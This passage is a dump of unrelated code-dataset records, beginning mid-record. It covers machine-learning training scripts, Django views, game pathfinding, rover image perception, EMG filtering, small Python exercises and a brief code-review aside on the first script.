x_vali_list,y_vali,_=read_x_y_mapping(mappings,basedirs,'vali',False,args)\r\n    x_vali=load_all_valid(x_vali_list,args)\r\n    try:\r\n        model.fit_generator(\r\n            data_generator(True,x_train_list,y_train,args,indexes),\r\n            validation_data=(x_vali,y_vali),\r\n            validation_steps=1,\r\n            steps_per_epoch=(15),\r\n            epochs=args.epochs,\r\n            callbacks=[cblog,cbtb,cbckpt],\r\n            class_weight=([0.092,0.96,0.94] if not args.balance else [1,1,1])\r\n        )\r\n        model.save('./models/cnn_'+nowtime+'.h5')\r\n        model.save_weights('./models/cnn_'+nowtime+'_weight.h5')\r\n        jst=model.to_json()\r\n        with open('./models/cnn_'+nowtime+'_json.h5','w') as file:\r\n            file.write(jst)\r\n        \r\n        y_pred=model.predict(x_vali)\r\n        y_pred=np.argmax(y_pred,axis=1)\r\n        y_ture=np.argmax(y_vali,axis=1)\r\n        labels=['negative','positive','polluted']\r\n        plot_confusion_matrix(y_ture,y_pred,labels)\r\n        evaluate(y_ture,y_pred)\r\n    except KeyboardInterrupt:\r\n        os.system(\"sh purge.sh \"+nowtime)\r\n\r\ndef test(args):\r\n    model=load_model(args.model)\r\n    x_vali_list,y_vali,_=read_x_y_mapping(mappings,basedirs,'vali',False,args)\r\n    x_vali=load_all_valid(x_vali_list,args)\r\n    y_pred=model.predict(x_vali)\r\n    y_pred=np.argmax(y_pred,axis=1)\r\n    y_ture=np.argmax(y_vali,axis=1)\r\n    labels=['negative','positive','polluted']\r\n    plot_confusion_matrix(y_ture,y_pred,labels)\r\n    evaluate(y_ture,y_pred)\r\n\r\nif __name__==\"__main__\":\r\n    import argparse\r\n    parser=argparse.ArgumentParser(description=\"CNN on TB\")\r\n    parser.add_argument('--tstrain',action='store_true',help='Training mode (positove first)')\r\n    parser.add_argument('--train',action='store_true',help='Training mode')\r\n    parser.add_argument('--test',action='store_true',help='Testing mode')\r\n    parser.add_argument('--dev',action='store_true',help='Dev mode')\r\n    parser.add_argument('-m','--model',type=str,help='The model you want to test on')\r\n    parser.add_argument('--width',type=int,default=420)\r\n    parser.add_argument('--height',type=int,default=131)\r\n    
parser.add_argument('--batch',type=int,default=32,help='Batch size')\r\n    parser.add_argument('--epochs',type=int,default=200,help='#Epochs')\r\n    parser.add_argument('--balance',action='store_true',help='Balance data by undersampling the majiroty data')\r\n    parser.add_argument('--n_labels',type=int,default=3)\r\n    args=parser.parse_args()\r\n    config_environment(args)\r\n    if args.train:\r\n        print(\"TS Training mode\")\r\n        if args.balance:\r\n            args.batch-=(args.batch%3)\r\n        train(args)\r\n    if args.tstrain:\r\n        print(\"Training mode\")\r\n        if args.balance:\r\n            args.batch-=(args.batch%3)\r\n        model,nowtime=train_on_positive(args)\r\n        train_on_all(args,model,nowtime)\r\n    if args.test:\r\n        print(\"Testing mode\")\r\n        test(args)\r\n    if args.dev:\r\n        print(\"Dev mode\")\r\n","sub_path":"saved_do_not_del_src/cnn_2019-03-20-14:44.py","file_name":"cnn_2019-03-20-14:44.py","file_ext":"py","file_size_in_byte":10932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
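Two details in the training script above are worth flagging. First, train_on_all references cblog, cbtb and cbckpt, which are local to train_on_positive, so calling it as written raises a NameError; second, Keras documents class_weight as a dict mapping class index to weight rather than a list. A minimal sketch of both fixes, assuming the script's own imports and the nowtime stamp passed into train_on_all:

# Rebuild the callbacks locally (names and paths follow the script's convention):
cblog = CSVLogger('./log/cnn_' + nowtime + '.csv')
cbtb = TensorBoard(log_dir='./Graph', batch_size=args.batch)
cbckpt = ModelCheckpoint('./models/cnn_' + nowtime + '_best.h5', monitor='val_loss', save_best_only=True)

# class_weight as a dict, mirroring the script's [0.092, 0.96, 0.94] list:
class_weight = {0: 0.092, 1: 0.96, 2: 0.94} if not args.balance else {0: 1, 1: 1, 2: 1}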
+{"seq_id":"130570592","text":"\nimport speech_recognition as sr\n\n\ndef EscreveArquivo(mensagem):\n    try:\n        with open(\"transcricao_audio.txt\", \"a\") as file:\n            file.write(str(mensagem) + \"\\n\")\n            file.close()\n    except:\n        print(\"Erro na Escrita da \" + mensagem)\n\n\nr = sr.Recognizer()\nmensagem = \"\"\n\nwhile(mensagem != \"desligar\"):\n    with sr.Microphone() as source:\n        r.adjust_for_ambient_noise(source)\n        print(\"Diga Algo:\")\n        audio = r.listen(source)\n        print(\"Hello\")\n\n\n    try:\n        mensagem = r.recognize_google(audio, language='pt-BR')\n        print(\"Você falou: \" + mensagem)\n    except sr.UnknownValueError:\n        print(\"Google Speech Recognition não pode entender o que você falou!\")\n    except sr.RequestError as e:\n        print(\"Não foram obtidos resultados do  Google Speech Recognition service; {0}\".format(e))\n\n    EscreveArquivo(mensagem)","sub_path":"voice_recognizer.py","file_name":"voice_recognizer.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"626594679","text":"from django.shortcuts import get_object_or_404, render\nfrom .models import Event\nfrom django.core.paginator import EmptyPage, PageNotAnInteger, Paginator\n\n\ndef index(request):\n    events = Event.objects.all()\n    paginator = Paginator(events, 2)\n    page = request.GET.get('page')\n    paged_event = paginator.get_page(page)\n\n    context = {\n        'events': paged_event\n    }\n    return render(request, 'events/events.html', context)\n\n\ndef event(request, event_id):\n    event = get_object_or_404(Event, pk=event_id)\n    event_context = {\n        'event': event,\n    }\n    return render(request, 'events/event.html', event_context)\n\n","sub_path":"randr/events/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"190902959","text":"class Solution:\n    # Sliding Window\n    def maxSatisfied(self, customers: List[int], grumpy: List[int], minutes: int) -> int:\n        start, maxSatisfied, currSatisfied = 0, 0, 0\n        nonGrumpySum = 0\n        for i in range(len(customers)):\n            # use sliding window to find the best place to apply \"minutes\"\n            if grumpy[i] == 1:\n                currSatisfied += customers[i]\n            if i - start + 1 > minutes:\n                if grumpy[start] == 1:\n                    currSatisfied -= customers[start]\n                start += 1\n            maxSatisfied = max(maxSatisfied, currSatisfied)\n\n            # keep track non-grumpy value\n            if grumpy[i] == 0:\n                nonGrumpySum += customers[i]\n        return nonGrumpySum + maxSatisfied\n","sub_path":"1052.GrumpyBookstoreOwner.py","file_name":"1052.GrumpyBookstoreOwner.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"286253723","text":"\n\"\"\"Create an application instance or show a QWebEngineView.\n    A very recommendable read is here:\n        https://hackingandslacking.com/demystifying-flasks-application-context-c7bd31a53817\"\"\"\n\n\n# Include dependencies. @see https://stackoverflow.com/a/56999264\ndef include():\n    from os import getenv\n    from pathlib import Path\n    from sys import path, version\n\n    if __name__ == '__main__' or 'gunicorn' in getenv(key='_') or 'uwsgi' in getenv(key='_'):\n        path.append(Path.cwd().joinpath('__pypackages__', version[:3], 'lib').__str__())\n        if not getenv(key='FLASK_SKIP_DOTENV'):\n            from dotenv import load_dotenv\n\n            load_dotenv(dotenv_path='.env')\n    if '.' in __name__:\n        path.append(Path.cwd().joinpath('src').__str__())\n\n\ndef load(config_object=None):\n    include()\n    from util.main import app, boot\n    boot(conf_obj=config_object)\n\n    return app\n\n\napp = load()\n\nif __name__ == '__main__':\n    from util.ui import UI\n    UI().run(app=app)\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"119519888","text":"import sys\nimport copy\n\nsys.path.append(\"../simpleai\")\nsys.path.append(\"../PythonAdvanced2BA/AIproject\")\n\nfrom simpleai.search import astar, SearchProblem\nfrom kingandassassins import KingAndAssassinsClient, BOARD, KingAndAssassinsState\n\nDIRECTIONS = KingAndAssassinsState.DIRECTIONS\n\n\nclass KingPath(SearchProblem):\n    \"\"\"\n    Searches for the shortest path for the king to arrive at his castle, this does not take into account other pieces\n    on the board that could block the king.\n    \"\"\"\n\n    def actions(self, state):\n        # If the king is on the castle door, the only action is to enter...\n        if state == (2, 2):\n            return [('move', 2, 2, 'N')]\n        elif state == (4, 1):\n            return [('move', 4, 1, 'W')]\n\n        actions = []\n\n        # Try moves in all 4 directions\n        for d, move in DIRECTIONS.items():\n            s = (state[0] + move[0], state[1] + move[1])\n            if self._is_valid(s):\n                actions.append(('move', state[0], state[1], d))\n        return actions\n\n    def result(self, state, action):\n        return (state[0] + DIRECTIONS[action[3]][0], state[1] + DIRECTIONS[action[3]][1])\n\n    def is_goal(self, state):\n        return state == (1, 2) or state == (4, 0)\n\n    def cost(self, state, action, state2):\n        return 1\n\n    def heuristic(self, state):\n        return min(manathan_distance(state, (1, 2)), manathan_distance(state, (4, 0)))\n\n    def _is_valid(self, state):\n        if state[0] < 0 or state[0] > 9 or state[1] < 0 or state[1] > 9:\n            return False\n        if BOARD[state[0]][state[1]] == \"R\":\n            return False\n        return True\n\n\nclass MaximizeProblem(SearchProblem):\n\n    def score(self, state, action, state2):\n        raise NotImplementedError\n\n\nclass MaximizeNode:\n\n    def __init__(self, state, parent=None, action=None, cost=0, score=0, problem=None,\n                 depth=0):\n        self.state = state\n        self.parent = parent\n        self.action = action\n        self.cost = cost\n        self.score = score\n        self.problem = problem or parent.problem\n        self.depth = depth\n\n    def expand(self, local_search=False):\n        '''Create successors.'''\n        new_nodes = []\n        for action in self.problem.actions(self.state):\n            new_state = self.problem.result(self.state, action)\n            cost = self.problem.cost(self.state, action, new_state)\n            score = self.problem.score(self.state, action, new_state)\n            nodefactory = self.__class__\n            new_nodes.append(nodefactory(state=new_state,\n                                         parent=None if local_search else self,\n                                         problem=self.problem,\n                                         action=action,\n                                         cost=self.cost + cost,\n                                         score=self.score + score,\n                                         depth=self.depth + 1))\n        return new_nodes\n\n    def path(self):\n        '''Path (list of nodes and actions) from root to this node.'''\n        node = self\n        path = []\n        while node:\n            path.append((node.action, node.state))\n            node = node.parent\n        return list(reversed(path))\n\n    def __eq__(self, other):\n        return isinstance(other, MaximizeNode) and self.state == other.state\n\n    def __lt__(self, other):\n        return 
isinstance(other, MaximizeNode) and self.score < other.score\n\n    def __gt__(self, other):\n        return isinstance(other, MaximizeNode) and self.score > other.score\n\n\ndef maximize(problem, cost_limit, fringe=None, node_factory=MaximizeNode):\n    n_processed = n_fringe = n_replaced = 0\n    fringe = fringe or []\n    reach = []\n    memory = set()\n    initial_node = node_factory(state=problem.initial_state,\n                                problem=problem)\n    fringe.append(initial_node)\n\n    while fringe:\n        node = fringe.pop()\n        memory.add(node.state)\n\n        if node.cost < cost_limit:\n            expanded = node.expand()\n\n            for n in expanded:\n                n_processed += 1\n\n                if n.cost > cost_limit:\n                    expanded.remove(n)\n                    continue\n\n                if n.depth > 2 and n.cost <= 1:\n                    continue\n\n                # This is very expensive :(\n                others = [x for x in fringe if x == n]\n\n                assert len(others) in (0, 1)\n                if n.state not in memory and len(others) == 0:\n                    fringe.append(n)\n                    n_fringe += 1\n                elif len(others) > 0 and n.cost < others[0].cost:\n                    fringe.remove(others[0])\n                    fringe.append(n)\n                    n_replaced += 1\n\n        else:\n            reach.append(node)\n\n    print(\"Processed: \", n_processed, \"\\nFringe:\", n_fringe, \"\\nReplaced:\", n_replaced)\n\n    return max(reach) if len(reach) > 0 else initial_node\n\n\nclass KingTurn(MaximizeProblem):\n    \"\"\"\n    Searches for the shortest path for the king to arrive at his castle, this does not take into account other pieces\n    on the board that could block the king.\n    \"\"\"\n\n    def __init__(self, initial_state=None):\n        self.king = None\n        self.knights = None\n        self.citizens = None\n        self.assassins = None\n        super().__init__(initial_state)\n\n    def actions(self, state):\n        self.king, self.knights, self.citizens, self.assassins = self._pawn_positions(state.people)\n\n        actions = []\n\n        if state.action_points['king'] > 0:\n            # If the king is on the castle door, the only action is to enter...\n            if self.king == (2, 2):\n                return [('move', 2, 2, 'N')]\n            elif self.king == (4, 1):\n                return [('move', 4, 1, 'W')]\n\n            # Try to move the king in all 4 directions\n            for d, move in DIRECTIONS.items():\n                k = (self.king[0] + move[0], self.king[1] + move[1])\n                # print(\"King from\", self.king, \"to\", k, \"is\", \"valid\" if self._is_king_valid(state, k) else \"not valid\")\n                if self._is_king_valid(state, k):\n                    actions.append(('move', self.king[0], self.king[1], d))\n\n        if state.action_points['knights'] > 0:\n            # Try to move the knights\n            for knight in self.knights:\n                for d, move in DIRECTIONS.items():\n                    k = (knight[0] + move[0], knight[1] + move[1])\n                    # print(\"Knight from\", knight, \"to\", k, \"is\",\n                    #       \"valid\" if self._is_knight_valid(state, k) else \"not valid\")\n                    if self._is_knight_valid(state, k):\n                        actions.append(('move', knight[0], knight[1], d))\n\n        # print(\"ACTIONS POSSIBLE: \", actions)\n        return 
actions\n\n    def result(self, state, action):\n        s = state.duplicate()\n        x, y = (action[1], action[2])\n        dx, dy = tuple(DIRECTIONS[action[3]])\n        p = s.people[x][y]\n        s.people[x][y] = None\n        s.people[x + dx][y + dy] = p\n\n        moved = state.people[action[1]][action[2]]\n        if moved == \"knight\":\n            s.action_points['knights'] -= 1\n        else:\n            s.action_points['king'] -= 1\n        # s.prettyprint()\n        return s\n\n    def cost(self, state, action, state2=None):\n        moved = state.people[action[1]][action[2]]\n\n        if moved == \"knight\":\n            x, y = (action[1] + DIRECTIONS[action[3]][0], action[2] + DIRECTIONS[action[3]][1])\n            if BOARD[x][y] == \"R\":\n                return 2\n        return 1\n\n    def score(self, state, action, state2):\n        moved = state.people[action[1]][action[2]]\n\n        if moved == \"king\":\n            king = (self.king[0] + DIRECTIONS[action[3]][0], self.king[1] + DIRECTIONS[action[3]][1])\n\n            path_result = astar(KingPath(initial_state=(action[1], action[2])))\n            if action == path_result.path()[0][0]:\n                print(\"YES, good job...\")\n                return 5\n\n            d1 = min(manathan_distance(self.king, (1, 2)), manathan_distance(self.king, (4, 0)))\n            d2 = min(manathan_distance(king, (1, 2)), manathan_distance(king, (4, 0)))\n            score = 3 if d1 - d2 > 0 else -1\n            return score\n\n        else:\n            knight = (action[1] + DIRECTIONS[action[3]][0], action[2] + DIRECTIONS[action[3]][1])\n            d1 = manathan_distance((action[1], action[2]), self.king)\n            d2 = manathan_distance(knight, self.king)\n            score = 1 if d1 - d2 > 0 else 0\n            return score\n\n    def _is_king_valid(self, state, king):\n        # Check king\n        if king[0] < 0 or king[0] > 9 or king[1] < 0 or king[1] > 9:\n            return False\n        if BOARD[king[0]][king[1]] == \"R\":\n            return False\n        if state.people[king[0]][king[1]] is not None:\n            return False\n\n        return True\n\n    def _is_knight_valid(self, state, knight):\n        # Check king\n        if knight[0] < 0 or knight[0] > 9 or knight[1] < 0 or knight[1] > 9:\n            # print(\"out of board\")\n            return False\n        if state.people[knight[0]][knight[1]] is not None:\n            # print(\"occupied\", state.people[knight[0]][knight[1]])\n            return False\n\n        return True\n\n    def _pawn_positions(self, state):\n        king = None\n        knights = []\n        citizens = []\n        assassins = []\n\n        for x, row in enumerate(state):\n            # print(\"\")\n            for y, p in enumerate(row):\n                # print(p)\n                if p is None:\n                    continue\n                elif p == \"knight\":\n                    knights.append((x, y))\n                elif p == \"king\":\n                    king = (x, y)\n                elif p == \"assassin\":\n                    assassins.append((x, y))\n                else:\n                    citizens.append((x, y))\n\n        return (king, knights, citizens, assassins)\n\n\ndef manathan_distance(p1, p2):\n    return abs(p1[0] - p2[0]) + abs(p1[1] - p2[1])\n","sub_path":"pathfinding.py","file_name":"pathfinding.py","file_ext":"py","file_size_in_byte":10042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
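KingPath plugs directly into simpleai's astar, as KingTurn.score already does internally. A minimal driver sketch; the starting square is chosen here purely for illustration:

# (8, 4) is a hypothetical starting position; any non-"R" square on the 10x10 board works.
result = astar(KingPath(initial_state=(8, 4)))
for action, state in result.path():
    print(action, state)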
+{"seq_id":"618883422","text":"import numpy as np\nimport cv2\n\n# Identify pixels above the threshold\n# Threshold of RGB > 160 does a nice job of identifying ground pixels only\ndef color_thresh(img, rgb_thresh=(160, 160, 160)):\n    # Create an array of zeros same xy size as img, but single channel\n    color_select = np.zeros_like(img[:,:,0])\n    # Require that each pixel be above all three threshold values in RGB\n    # above_thresh will now contain a boolean array with \"True\"\n    # where threshold was met\n    above_thresh = (img[:,:,0] > rgb_thresh[0]) \\\n                & (img[:,:,1] > rgb_thresh[1]) \\\n                & (img[:,:,2] > rgb_thresh[2])\n    # Index the array of zeros with the boolean array and set to 1\n    color_select[above_thresh] = 1\n    # Return the binary image\n    return color_select\n\n# Define a function to convert to rover-centric coordinates\ndef rover_coords(binary_img):\n    # Identify nonzero pixels\n    ypos, xpos = binary_img.nonzero()\n    # Calculate pixel positions with reference to the rover position being at the \n    # center bottom of the image.  \n    x_pixel = np.absolute(ypos - binary_img.shape[0]).astype(np.float)\n    y_pixel = -(xpos - binary_img.shape[0]).astype(np.float)\n    return x_pixel, y_pixel\n\n\n# Define a function to convert to radial coords in rover space\ndef to_polar_coords(x_pixel, y_pixel):\n    # Convert (x_pixel, y_pixel) to (distance, angle) \n    # in polar coordinates in rover space\n    # Calculate distance to each pixel\n    dist = np.sqrt(x_pixel**2 + y_pixel**2)\n    # Calculate angle away from vertical for each pixel\n    angles = np.arctan2(y_pixel, x_pixel)\n    return dist, angles\n\n# Define a function to apply a rotation to pixel positions\ndef rotate_pix(xpix, ypix, yaw):\n    # TODO:\n    # Convert yaw to radians\n    # Apply a rotation\n    yaw_rad = yaw * np.pi / 180\n    xpix_rotated = xpix * np.cos(yaw_rad) - ypix * np.sin(yaw_rad)\n    ypix_rotated = xpix * np.sin(yaw_rad) + ypix * np.cos(yaw_rad)\n    # Return the result  \n    return xpix_rotated, ypix_rotated\n\n# Define a function to perform a translation\ndef translate_pix(xpix_rot, ypix_rot, xpos, ypos, scale): \n    # TODO:\n    # Apply a scaling and a translation\n    scale = 10\n    # Perform translation and convert to integer since pixel values can't be float\n    xpix_translated = np.int_(xpos + (xpix_rot / scale))\n    ypix_translated = np.int_(ypos + (ypix_rot / scale))\n    # Return the result  \n    return xpix_translated, ypix_translated\n\n# Define a function to apply rotation and translation (and clipping)\n# Once you define the two functions above this function should work\ndef pix_to_world(xpix, ypix, xpos, ypos, yaw, world_size, scale):\n    # Apply rotation\n    xpix_rot, ypix_rot = rotate_pix(xpix, ypix, yaw)\n    # Apply translation\n    xpix_tran, ypix_tran = translate_pix(xpix_rot, ypix_rot, xpos, ypos, scale)\n    # Perform rotation, translation and clipping all at once\n    x_pix_world = np.clip(np.int_(xpix_tran), 0, world_size - 1)\n    y_pix_world = np.clip(np.int_(ypix_tran), 0, world_size - 1)\n    # Return the result\n    return x_pix_world, y_pix_world\n\n# Define a function to perform a perspective transform\ndef perspect_transform(img, src, dst):\n           \n    M = cv2.getPerspectiveTransform(src, dst)\n    warped = cv2.warpPerspective(img, M, (img.shape[1], img.shape[0]))# keep same size as input image\n    \n    return warped\n\ndef rock_thresh(img, boundary =([100,100,0], [200,200,70])):\n    
\"\"\"apply thresholding to find the rock sample\"\"\"\n    lower = np.array(boundary[0], dtype = \"uint8\")\n    upper = np.array(boundary[1], dtype = \"uint8\")\n    # create mask\n    mask = cv2.inRange(img, lower, upper)\n    # apply image masking\n    output = cv2.bitwise_and(img, img, mask = mask)\n    # convert result to gray\n    output = cv2.cvtColor(output, cv2.COLOR_RGB2GRAY)\n    # create temp image for our rock\n    zeros = np.zeros_like(img[:,:,0])\n    try:\n        # get the closest coordinate of the transformed rock\n        closest_x = max(output.nonzero()[1])\n        closest_y = max(output.nonzero()[0])\n        # make the rock look bigger instead of just dot\n        zeros[closest_y:closest_y+5,closest_x:closest_x+5] = 1\n        return zeros\n    except:\n        #if no rock is in image, return zeros\n        return zeros\n# Apply the above functions in succession and update the Rover state accordingly\ndef perception_step(Rover):\n    # Perform perception steps to update Rover()\n    # TODO: \n    # NOTE: camera image is coming to you in Rover.img\n    # 1) Define source and destination points for perspective transform\n    dst_size = 5 \n    bottom_offset = 6\n    source = np.float32([[14, 140], [301 ,140],[200, 96], [118, 96]])\n    destination = np.float32([[Rover.img.shape[1]/2 - dst_size, Rover.img.shape[0] - bottom_offset],\n                  [Rover.img.shape[1]/2 + dst_size, Rover.img.shape[0] - bottom_offset],\n                  [Rover.img.shape[1]/2 + dst_size, Rover.img.shape[0] - 2*dst_size - bottom_offset], \n                  [Rover.img.shape[1]/2 - dst_size, Rover.img.shape[0] - 2*dst_size - bottom_offset],\n                  ])\n    # 2) Apply perspective transform\n    warped_terrain = perspect_transform(Rover.img, source, destination)\n\n    # 3) Apply color threshold to identify navigable terrain/obstacles/rock samples\n    thresholded_navigable = color_thresh(warped_terrain, rgb_thresh=(160, 160, 160))\n\n    # get index of the navigable terrain\n    not_obstacle_index = thresholded_navigable.nonzero()\n    # create obstacle image, which is the reverse of navigable terrain (thresholded)\n    obstacle = np.ones_like(Rover.img[:,:,0])\n    obstacle[not_obstacle_index] = 0\n\n    # detect rock if it exist\n    rock = rock_thresh(warped_terrain)\n\n    # 4) Update Rover.vision_image (this will be displayed on left side of screen)\n\n    # update Rover.vision_image[:,:,0] = obstacle color-thresholded binary image\n    Rover.vision_image[:,:,0] = obstacle\n\n    # update Rover.vision_image[:,:,1] = rock_sample color-thresholded binary image\n    Rover.vision_image[:,:,1] = rock\n\n    # update Rover.vision_image[:,:,2] = navigable terrain color-thresholded binary image\n    Rover.vision_image[:,:,2] = thresholded_navigable\n\n    # 5) Convert map image pixel values to rover-centric coords\n    navigable_xpix, navigable_ypix = rover_coords(thresholded_navigable)\n    obstacle_xpix, obstacle_ypix = rover_coords(obstacle)\n    rock_xpix, rock_ypix = rover_coords(rock)\n\n    # 6) Convert rover-centric pixel values to world coordinates\n    world_size = 200\n    scale = 10\n    navigable_xpix_world, navigable_ypix_world = pix_to_world(navigable_xpix, navigable_ypix, Rover.pos[0], Rover.pos[1], \n                                                      Rover.yaw, world_size, scale)\n    obstacle_xpix_world, obstacle_ypix_world = pix_to_world(obstacle_xpix, obstacle_ypix, Rover.pos[0], Rover.pos[1], \n                                                      
Rover.yaw, world_size, scale)\n    rock_xpix_world, rock_ypix_world = pix_to_world(rock_xpix, rock_ypix, Rover.pos[0], Rover.pos[1], \n                                                      Rover.yaw, world_size, scale)\n\n    # 7) Update Rover worldmap (to be displayed on right side of screen)\n    Rover.worldmap[obstacle_ypix_world, obstacle_xpix_world, 0] += 1\n    Rover.worldmap[rock_ypix_world, rock_xpix_world, 1] += 1\n    Rover.worldmap[navigable_ypix_world, navigable_xpix_world, 2] += 1\n\n\n    # 8) Convert rover-centric pixel positions to polar coordinates\n    # Update Rover pixel distances and angles\n        # Rover.nav_dists = rover_centric_pixel_distances\n        # Rover.nav_angles = rover_centric_angles\n    dist, angles = to_polar_coords(navigable_xpix, navigable_ypix)\n    Rover.nav_dists = dist\n    Rover.nav_angles = angles\n      \n    \n    return Rover","sub_path":"RoboND-Rover-Project/code/perception.py","file_name":"perception.py","file_ext":"py","file_size_in_byte":7759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
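The nav_angles computed above are what the decision step typically steers on: the rover turns toward the mean navigable angle. A small standalone sketch of that use, assuming to_polar_coords from the module above; the plus/minus 15 degree clip mirrors the simulator's usual steering range, an assumption here:

import numpy as np

# Toy rover-centric pixels: terrain ahead and slightly to the left.
xpix = np.array([10.0, 20.0, 30.0])
ypix = np.array([0.0, 5.0, 10.0])
dist, angles = to_polar_coords(xpix, ypix)
steer = np.clip(np.mean(angles * 180 / np.pi), -15, 15)
print(dist, steer)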
+{"seq_id":"272737671","text":"from collections import deque\nfrom threading import Lock, Thread\nimport numpy as np\nimport time\nimport myo\n#from IIRFilter import LowPassIIR\n\n\n\nclass BufferPlus(myo.DeviceListener):\n    #An instance of this class constantly collects new EMG data in a queue (buffer)\n    def __init__(self, buffer_len):\n        self.n = buffer_len\n        self.lock = Lock()\n        self.mav_data_queue = deque(maxlen=self.n)\n        # self.y = 0\n        # self.a = 24/25*np.ones([8,1])\n        self.y = np.zeros(8)\n        self.a = 24/25\n        self.mav_data_queue = deque(maxlen=self.n)\n\n    def filter(self,x):\n        # self.y = (1-self.a[self.i]) * x + self.a[self.i] * self.y\n        self.y = (1 - self.a) * x + self.a * self.y\n        return self.y\n\n    # def get_mav_data(self,in_data):\n        # mav_data = []\n        # #num_splitarray = np.linspace(0,496,64,dtype=int) #(step = 7, num = 64)\n\n        # with self.lock:\n            # # compute the MAV data\n            # #for j in num_splitarray:\n            # for self.i in range(0,8):\n\n                # col_data = in_data[:,self.i]\n                # abs_data = np.absolute(col_data)\n                \n                # # filter\n                # for n in range(0, len(abs_data)):\n                    # abs_data[n] = self.filter(abs_data[n])\n                # mav_data.append(list(abs_data))\n\n        # return mav_data\n        \n    def get_mav_data(self, in_data):  # 512*8\n        mav_data = np.zeros((0,8))  # 8 columns\n        for sample in in_data:\n            aaa = self.filter(np.array(abs(sample)))\n            mav_data = np.row_stack((mav_data, aaa))\n        return mav_data\n\n","sub_path":"myo_ecn/listenersPlus.py","file_name":"listenersPlus.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"624573467","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\noracle_url = 'http://127.0.0.1:20632'\nheaders = {'Content-type': 'application/json'}\nmethod_recharge = \"sendrechargetransaction\"\nmethod_blk_log = \"getwithdrawtransactionsbyheight\"\nmethod_exist_txs = \"getexistdeposittransactions\"\nmethod_blk_num = \"getblockcount\"\nmethod_tx_info = \"getwithdrawtransaction\"\n\nkey_crosschainassets = \"crosschainassets\"\nkey_crosschainaddress = \"crosschainaddress\"\nkey_crosschainamount = \"crosschainamount\"\nkey_outputamount = \"outputamount\"\nkey_txid = 'txid'","sub_path":"tests/sidechain_eth/case/orcal_config.py","file_name":"orcal_config.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"469567261","text":"#exercise 06-03\n'''\nstudent name:dante\nclass:net182\nstudent id:201810701580051\n'''\nfrom tkinter import *\nroot = Tk()\n\nuser_text = Entry(root)\nuser_text.pack()\n\nlabel1 = Label(root,text = '')\nlabel1.pack()\n\ndef calcC():\n    num = float(Entry.get(user_text))\n    new_temp = (num - 32)/1.8\n    label1.config(text=str(new_temp))\ndef calcF():\n    num = float(Entry.get(user_text))\n    new_temp = num*1.8+32\n    label1.config(text=str(new_temp))\n\n\nbutton1 = Button(root,text = 'celsius',fg='red',command = calcC)\nbutton2 = Button(root,text = 'Fahrenheit',fg='green',command = calcF)\nbutton1.pack(side = LEFT)\nbutton2.pack(side = LEFT)\nroot.mainloop()\n","sub_path":"Python_OOP/Exercise/Exercise 06/201810701580051 - Dante/06-03.py","file_name":"06-03.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"622135468","text":"# Takes a list of integers and finds two numbers that add up to a target value.\n\noutput = list()\nnums = list()\nnumLength = int(input(\"How many numbers are in the number list: \"))\ntarget = int(input(\"What is the Target Integer: \"))\nn = 0\ni = 0\np = 0\n\nwhile n < numLength :\n    nums.append(int(input(\"Enter a number in the number list: \")))\n    n += 1\nprint(\"----------------------------\")\n\nwhile i < numLength :\n    while p < numLength :\n        if nums[i] + nums[p] == target :\n            output.append(i)\n            output.append(p)\n            print(\"The indices are: \" + str(output[0]) + \" and \" + str(output[1]))\n        p += 1\n    i += 1","sub_path":"Math/Two-Sum/Two-Sum.py","file_name":"Two-Sum.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"568936847","text":"from typing import List\n\n\nclass TreeNode:\n    def __init__(self, x):\n        self.val = x\n        self.left = None\n        self.right = None\n\n\nclass Solution:\n    def binary_tree_paths(self, root: TreeNode) -> List[str]:\n        paths = []\n\n        def deep(root, path):\n            if not root:\n                return\n            path = path + [str(root.val)]\n            if not root.left and not root.right:\n                return paths.append(\"->\".join(path))\n            deep(root.left, path)\n            deep(root.right, path)\n\n        deep(root, [])\n        return paths\n","sub_path":"0257.binary_tree_paths/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"138446224","text":"import math\r\nimport torch\r\nimport sys\r\nimport torch.nn as nn\r\nfrom model import AutoEncoder\r\nimport matplotlib.pyplot as plt\r\nfrom torch.autograd import Variable\r\nfrom torch.utils.data import DataLoader\r\nfrom torch.optim import Adam, lr_scheduler, SGD\r\nfrom torchvision import datasets, transforms\r\n\r\ndef load_data(data_dir, batch_size):\r\n    \"\"\" Method returning a data loader for labeled data \"\"\"\r\n    transform = transforms.Compose([\r\n        transforms.ToTensor(),\r\n        transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\r\n        ]\r\n    )\r\n    data = datasets.ImageFolder(f'{data_dir}/unsupervised', transform=transform)\r\n    data_loader = DataLoader(\r\n        data,\r\n        batch_size=batch_size,\r\n        shuffle=True,\r\n        num_workers=0\r\n    )\r\n    return data_loader\r\n\r\n\r\ndef find_lr( model, data_loader, device, init_value = 1e-8, final_value=10, beta = 0.98):\r\n    num = len(data_loader)-1\r\n    mult = (final_value / init_value) ** (1/num)\r\n    lr = init_value\r\n    optimizer.param_groups[0]['lr'] = lr\r\n    avg_loss = 0.\r\n    